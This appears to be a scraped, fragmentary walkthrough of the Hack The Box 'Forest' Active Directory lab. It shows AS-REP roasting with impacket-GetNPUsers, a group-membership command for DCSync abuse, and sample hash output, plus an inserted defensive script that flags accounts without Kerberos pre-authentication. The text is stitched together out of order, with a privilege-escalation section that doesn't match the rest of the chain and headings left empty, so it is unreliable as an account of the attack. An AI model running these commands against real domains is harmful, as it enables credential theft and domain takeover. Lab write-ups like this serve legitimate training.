Forest Hackthebox Walkthrough Best Info

  • Look for readable shares containing configs, credentials, scripts or backups.
  • LDAP / AD enumeration:
  • Collect domain users and groups, find service accounts and SPNs.
  • Kerberos:

  • Now that we own the group, we can add ourselves to it. Then, we abuse DCSync to dump domain hashes.

    Add-DomainGroupMember -Identity "Exchange Windows Permissions" -Member "svc-alfresco"
    

    Forest is vulnerable to Kerberos AS-REP Roasting because some users have the Do not require Kerberos preauthentication setting enabled.

    Running whoami /groups reveals a shocking privilege:

    SeBackupPrivilege        Enabled
    SeRestorePrivilege       Enabled
    

    This is game over for the domain controller.
    SeBackupPrivilege allows reading any file on the system, including the NTDS.dit (the AD database).

    impacket-GetNPUsers htb.local/ -usersfile users.txt -dc-ip 10.10.10.161 -request -format hashcat -outputfile asreproast.hashes
    

    Output:

    [-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
    ... (many failures) ...
    $krb5asrep$23$svc-alfresco@htb.local:...
    

    Bingo. The user svc-alfresco is vulnerable.
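A defender-side check for the setting described above, as an added example that is not part of the original walkthrough: it parses an LDAP export in LDIF form and flags accounts whose userAccountControl has the DONT_REQUIRE_PREAUTH bit (0x400000) set. The LDIF entries, their DNs and values, and the function names are constructed for illustration.

```python
# Added example: audit an LDAP export for accounts that skip Kerberos pre-auth.
# SAMPLE_LDIF is constructed sample data, not output taken from the box.
UF_ACCOUNTDISABLE = 0x00000002
UF_DONT_REQUIRE_PREAUTH = 0x00400000  # "Do not require Kerberos preauthentication"

SAMPLE_LDIF = """\
dn: CN=sebastien,OU=Users,DC=htb,DC=local
sAMAccountName: sebastien
userAccountControl: 66048

dn: CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
sAMAccountName: svc-alfresco
userAccountControl: 4260352

dn: CN=old-svc,OU=Service Accounts,DC=htb,DC=local
sAMAccountName: old-svc
userAccountControl: 4194818
"""

def parse_ldif(text):
    """Return one dict per LDIF entry (single-valued attributes only)."""
    entries, current, last_key = [], {}, None
    for line in text.splitlines():
        if not line.strip():                      # blank line ends an entry
            if current:
                entries.append(current)
            current, last_key = {}, None
        elif line.startswith(" ") and last_key:   # folded continuation line
            current[last_key] += line[1:]
        elif ": " in line:
            last_key, value = line.split(": ", 1)
            current[last_key] = value
    if current:
        entries.append(current)
    return entries

def preauth_findings(entries):
    """Flag accounts with DONT_REQUIRE_PREAUTH set, enabled accounts first."""
    findings = []
    for e in entries:
        try:
            uac = int(e["userAccountControl"])
        except (KeyError, ValueError):
            continue                              # not a user object, or malformed
        if uac & UF_DONT_REQUIRE_PREAUTH:
            findings.append({"account": e.get("sAMAccountName", e.get("dn", "?")),
                             "enabled": not uac & UF_ACCOUNTDISABLE, "uac": hex(uac)})
    return sorted(findings, key=lambda f: not f["enabled"])

print(preauth_findings(parse_ldif(SAMPLE_LDIF)))
```

Any enabled account this reports should have pre-authentication turned back on, or carry a long random password if the setting cannot be removed.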

    The Forest box on Hack The Box provides a challenging but educational experience in the realm of cybersecurity. By following this walkthrough, you'll be able to:

    Best Practices and Takeaways

    Additional Resources
